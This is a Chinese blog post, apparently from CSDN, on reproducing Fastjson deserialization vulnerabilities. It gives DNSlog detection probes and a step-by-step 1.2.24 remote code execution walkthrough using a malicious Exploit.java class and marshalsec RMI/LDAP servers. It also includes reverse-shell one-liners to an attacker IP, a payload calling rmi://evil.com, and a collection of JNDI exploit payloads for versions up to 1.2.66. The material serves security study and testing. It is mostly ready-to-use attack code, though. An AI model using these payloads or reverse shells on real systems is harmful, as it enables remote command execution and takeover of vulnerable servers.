Fastjson漏洞复现

最新推荐文章于 2024-11-13 17:26:18 发布
最新推荐文章于 2024-11-13 17:26:18 发布
阅读量52 收藏
点赞数
文章标签: python 前端 javascript 开发语言 ecmascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43335965/article/details/133012367
版权
本文详细介绍了针对Fastjson的各种漏洞检测方法,包括报错信息判断、DNSlog盲打和DOS延迟方式。同时,文章阐述了Fastjson 1.2.24版本的反序列化命令执行漏洞的利用步骤,以及多个版本的payload集合,涉及RMI和LDAP服务。此外,还列举了不同版本的利用payload和相关参考链接。
摘要由CSDN通过智能技术生成

0x01:fastjson指纹识别

1. 报错信息判断fastjson

无特殊配置情况下fastjson,无正确的闭合会报错,返回结果里有fastjson字样。

image-20210806133705198

从上图可以看出,我们使用了一个花括号,fastjson处理json时会返回报错信息。

2. dnslog盲打判断fastjson

有的小伙伴就问了,如果是配置了不返回报错信息怎么办?那这种情况就只有利用dnslog盲打了。

1595340536.png!small1595340537.png!small

这里有个小技巧就是,如果你批量检查或者自己的dnslog里面有很多记录。你可以这样使用'baidu'.d1flzs.dnslog.cn,在dnslog前面加个名称

盲打payload

1.2.67版本前
{"zeo":{"@type":"java.net.Inet4Address","val":"745shj.dnslog.cn"}}
1.2.67版本后
{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}

畸形的

{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}

img

POC:

要嵌套在里面zeo里面

{"zeo":{"@type":"java.net.Inet4Address","val":"dnslog"}}
{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}
{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}
{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"dnslog"}}""}
{{"@type":"java.net.URL","val":"dnslog"}:"aaa"}
Set[{"@type":"java.net.URL","val":"dnslog"}]
Set[{"@type":"java.net.URL","val":"dnslog"}
{{"@type":"java.net.URL","val":"dnslog"}:0

3.通过DOS延迟方式

fastjson在版本<1.2.60在取不到值的时候会填充\u001a,发生DOS,我们可以构造请求,通过响应延迟来判断是否使用的fastjson

无构造的正常请求返回时间,28ms(这里Fiddler演示,Burp可以通过Repeater模块右下方观察)

在这里插入图片描述

构造错误的POST请求体返回时间,15ms(可见随意的错误请求不奏效)

在这里插入图片描述

通过 {“a”:"\x 触发DOS,585ms,和正常的和错误的请求响应时间差太多,由此来判断使用了fastjson解析器

在这里插入图片描述

0x02:fastjson 1.2.24 反序列化导致任意命令执行漏洞

攻击步骤

fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。

image-20200704111745527

主机A:存在fastjson反序列化漏洞的主机

主机C:为RMI/LDAP服务

主机B:为构造的恶意类(包含要执行的命令)

在整个远程命令执行流程:

1、黑客使用payload攻击主机A(该payload需要指定rmi/ldap地址)

2、主机A引发反序列化漏洞,发送了进行rmi远程发放调用,去连接主机C

3、主机C的rmi服务指定加载主机B的恶意java类,所以主机A通过主机C的rmi服务最终加载并执行主机B的恶意java类

4、主机A引发恶意系统命令执行

漏洞复现

kali安装java版本

cd /opt
curl http://www.joaomatosf.com/rnp/java_files/jdk-8u20-linux-x64.tar.gz -o jdk-8u20-linux-x64.tar.gz
tar zxvf jdk-8u20-linux-x64.tar.gz
rm -rf /usr/bin/java*
ln -s /opt/jdk1.8.0_20/bin/j* /usr/bin
javac -version
java -version

编译恶意类

javac Exploit.java

Exploit.java源码如下

import java.lang.Runtime;
import java.lang.Process;
public class Exploit{
 static {
 try {
 Runtime rt = Runtime.getRuntime();
 String[] commands = {"touch", "/tmp/hel10"};
 Process pc = rt.exec(commands);
 pc.waitFor();
 } catch (Exception e) {
 // do nothing
 }
 }
}

然后开启Web服务,让rmi服务能够获取到恶意类。

image-20210806130721457

再开启RMI服务监听

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.88.133:8888/#Exploit" 9999

image-20210806132124297

这里如果要启动LDAP服务的话,只需把上面命令中的RMI改成LDAP即可,例如:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://192.168.88.133:8888/#Exploit" 9999

然后利用payload攻击目标主机

{
 "b":{
 "@type":"com.sun.rowset.JdbcRowSetImpl",
 "dataSourceName":"rmi://192.168.88.133:9999/Exploit",
 "autoCommit":true
 }
}

目标主机触发反序列化漏洞,主动进行RMI远程调用连接VPS,RMI指定加载的是VPS上的恶意java类,从而目标主机通过RMI服务远程加载调用到了VPS上的恶意java类。

image-20210806132147402

攻击成功。

image-20210806131413175

接着反弹shell试试

"/bin/bash","-c","exec 5<>/dev/tcp/192.168.88.133/1234;cat <&5 | while read line; do $line 2>&5 >&5; done"
"/bin/bash", "-c", "bash -i >& /dev/tcp/192.168.88.133/1234 0>&1"

修改恶意的java类。

image-20210806132233116

成功反弹shell

image-20210806132254941

0x03:Fastjson<1.2.68远程代码执行漏洞

恶意java类

import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;

public class Exploit{
    public Exploit() throws Exception {
        Process p = Runtime.getRuntime().exec(new String[]{"bash", "-c", "touch /tmp/success"});
        InputStream is = p.getInputStream();
        BufferedReader reader = new BufferedReader(new InputStreamReader(is));

        String line;
        while((line = reader.readLine()) != null) {
            System.out.println(line);
        }

        p.waitFor();
        is.close();
        reader.close();
        p.destroy();
    }

    public static void main(String[] args) throws Exception {
    }
}

payload:

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://evil.com:9999/Exploit",
        "autoCommit":true
    }
}

0x04:多版本payload集合

影响版本:

fastjson<=1.2.24

exp:

{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://x.x.x.x:1099/jndi", "autoCommit":true}

影响版本:

fastjson<=1.2.41

前提:
autoTypeSupport属性为true才能使用。(fastjson>=1.2.25默认为false)

exp:

{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"rmi://x.x.x.x:1098/jndi", "autoCommit":true}

影响版本:

fastjson<=1.2.42

前提:
autoTypeSupport属性为true才能使用。(fastjson>=1.2.25默认为false)

exp:

{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"ldap://localhost:1399/Exploit", "autoCommit":true}

影响版本:

fastjson<=1.2.43

前提:
autoTypeSupport属性为true才能使用。(fastjson>=1.2.25默认为false)

exp:

{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"ldap://localhost:1399/Exploit", "autoCommit":true}

影响版本:

fastjson<=1.2.45

前提:
autoTypeSupport属性为true才能使用。(fastjson>=1.2.25默认为false)

exp:

{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://localhost:1399/Exploit"}}

影响版本:

fastjson<=1.2.47

exp:

{
    "a": {
        "@type": "java.lang.Class", 
        "val": "com.sun.rowset.JdbcRowSetImpl"
    }, 
    "b": {
        "@type": "com.sun.rowset.JdbcRowSetImpl", 
        "dataSourceName": "ldap://x.x.x.x:1999/Exploit", 
        "autoCommit": true
    }
}

影响版本:

fastjson<=1.2.62

exp:

{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"rmi://127.0.0.1:1098/exploit"}"

影响版本:

fastjson<=1.2.66

前提:
autoTypeSupport属性为true才能使用。(fastjson>=1.2.25默认为false)

exp:

{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://192.168.80.1:1389/Calc"}

{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://192.168.80.1:1389/Calc"}

{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://192.168.80.1:1389/Calc"}

{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"ldap://192.168.80.1:1399/Calc"}}

0x04:参考链接

https://www.cnblogs.com/dyanbk/p/14281460.html fastjson 1.2.24 反序列化导致任意命令执行漏洞

https://www.freebuf.com/articles/web/258253.html fastjson 1.2.24 反序列化 RCE 漏洞复现

https://zeo.cool/2020/07/04/红队武器库!fastjson小于1.2.68全漏洞RCE利用exp/ 红队武器库:fastjson小于1.2.68全漏洞RCE利用exp

https://www.cnblogs.com/mysticbinary/p/12788019.html fastjson 反弹shell

Held0
关注
fastjson漏洞复现
m0_56578216的博客
09-08 499
FastJson 是Alibab的一款开源Json 解析库,可用于将Java 对象转换为其Json 表示形式,也可以用于将Json 字符串转换为等效的Java 对象。近几年来FastJson 漏洞层出不穷。关于FasiJson 1.2.24 反序列化漏洞,简单来说,就是FastJson 通过parsebiect/parse 将传入的字符由反广列化为Java 对象时由于没有进行合理检查而导致的。poc中有rmi,它相当于Java的http协议,通过它可以远程执行引用一个外部类。
Fastjson系列漏洞实战和总结
qq_50854662的博客
10-09 3230
Fastjson系列漏洞实战和总结
FastJson 漏洞复现
来日可期的博客
09-11 2584
FastJson 1.2.24 反序列化导致任意命令执行漏洞Fastjson 1.2.47 远程命令执行漏洞
Fastjson 漏洞复现1.2.24-rce
人们并不感谢罗辑
08-22 1803
fastjson是阿里巴巴开源的一个json解析库,能将json对象和json字符串进行序列化和反序列化操作。autotype功能是是漏洞的关键,autotype允许用户通过@type字段来选择具体的类进行反序列化。如果用户没有对反序列化的类进行严格限制,攻击者可以构造恶意的json字符串来触发这个漏洞
【星落】Fastjson 漏洞复现
星星得不到爱火QAQ的博客
01-20 1114
Fastjson 是阿里巴巴的开源 JSON 解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。
fastjson 漏洞复现
温和的跳跃
07-09 320
可能从fastjson“盘古开天地”开始讲,因为我对序列化 反序列化还有那些组件非常不熟悉(谁不搞开发会对这些熟悉)也算复习一下java知识吧,之前好像我自己大二学习java序列化那章就搜索过序列化漏洞,没办法 我读书时候只对这种东西感兴趣,对一般知识没有兴趣。 我先自己学习一会去。 漏洞复现主要是vulhub/fastjson/1.2.24-rce ...
Fastjson漏洞分析与复现
未完成的歌~的博客
08-26 1020
fastjson是阿里巴巴开源的JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。即fastjson的主要功能就是将Java Bean序列化成JSON字符串,这样得到字符串之后就可以通过数据库等方式进行持久化了。
fastjson框架漏洞复现
没有
10-23 2383
fastjson是阿里巴巴开源的json解析库,通常被用于java object和json字符之间进行转换,提供两个方法json.tojsonstring和json.parseobject/json.parse来分别实现序列化与反序列化。
Fastjson历史漏洞复现
懂进攻知防守
07-27 1485
fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。...
ks8 本地化部署 F5-TTS
陈锐的技术笔记
11-13 541
此外,F5-TTS 还创新性地引入了推理时的 Sway Sampling 策略,这一策略可以在推理阶段优先处理早期的流步骤,从而提高生成语音与输入文本的对齐效果。在 LibriSpeech-PC 数据集上,该模型的字错误率(WER)达到了2.42,并且在推理时的实时因子(RTF)为0.15,显著优于之前的扩散模型 E2TTS,后者在处理速度和鲁棒性上存在短板。传统的 TTS 模型往往需要进行复杂的持续时间建模、音素对齐和专门的文本编码,这些都增加了合成过程的复杂性。继续TSS的启动,进入pod 输入命令。
自动化爬虫DrissionPage
m0_55297736的博客
11-09 954
自动化爬虫DrissionPage
什么是Python模块化编程
最新发布
大数据实战派
11-13 320
模块化编程是一种编程方法论,它将程序的功能划分为多个独立的模块,每个模块负责程序中的一部分功能。通过这种方式,程序的代码被分割成更小、更易管理的部分,每个模块都可以独立开发、调试和测试,模块之间通过接口进行交互。模块化编程是将一个复杂的程序拆分为多个独立、功能明确的小模块的编程方法。这不仅提高了代码的复用性和可维护性,还促进了团队协作开发,增强了程序的扩展性。在实际开发中,模块化编程让代码结构更加清晰,逻辑更加简洁,为程序的长久维护和扩展打下了坚实的基础。
外星人入侵
weixin_60243362的博客
11-12 1510
外星人入侵项目实践
推荐一款管道数据检索工具:Pipedata-Pro
11-09 413
是一款专为设计石油、天然气、水和蒸汽管道及管道系统的工程师开发的应用程序。该应用程序提供了设计管道系统所需的工程数据,拥有一个全面的管道类型、配件和材料。
python基础算法编程】
weixin_42333261的博客
11-12 492
这个函数使用两个指针,一个从字符串的开头开始,另一个从字符串的结尾开始。否则,函数递归调用自身,传入去掉首尾字符的子字符串。递归是一种直接的方法来计算斐波那契数列,但对于较大的 N 值,它会非常慢,因为它会重复计算相同的子问题。然后,它比较字符串的第一个和最后一个字符是否相等。如果它们不相等,函数返回。函数是一个生成器函数,用于生成从给定序列中选择指定长度的元素的所有排列。可以使用循环从最后一个元素开始,逐个访问每个元素,直到第一个元素。斐波那契数列是一个经典的数学序列,其中每个数字都是前两个数字的和。
Windows Update服务设置回自动启动
sinat_38424109的博客
11-08 157
你需要执行相反的操作,即将Windows更新相关的注册表项恢复到默认状态,重新启用计划任务,并将Windows Update服务设置回自动启动。
11.11 case class
2402_87076449的博客
11-11 236
1,使用case class创建图书信息类Book:包含四个属性:ID,书名,作者,价格,数量。2,创建一个名为BookList的可变List,它只能用来保存Book的实例。3,初始化三本不同的书(注意id不同就是不同的书),加入到BookList中。7,删除指定ID的书。9,遍历图书列表,并打印每本书的详细信息。3.自动重写:toString,equals,hashCode,copy。3.自动重写:toString,equals,hashCode,copy。1.不可变性 创建的对象的属性是不能修改的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值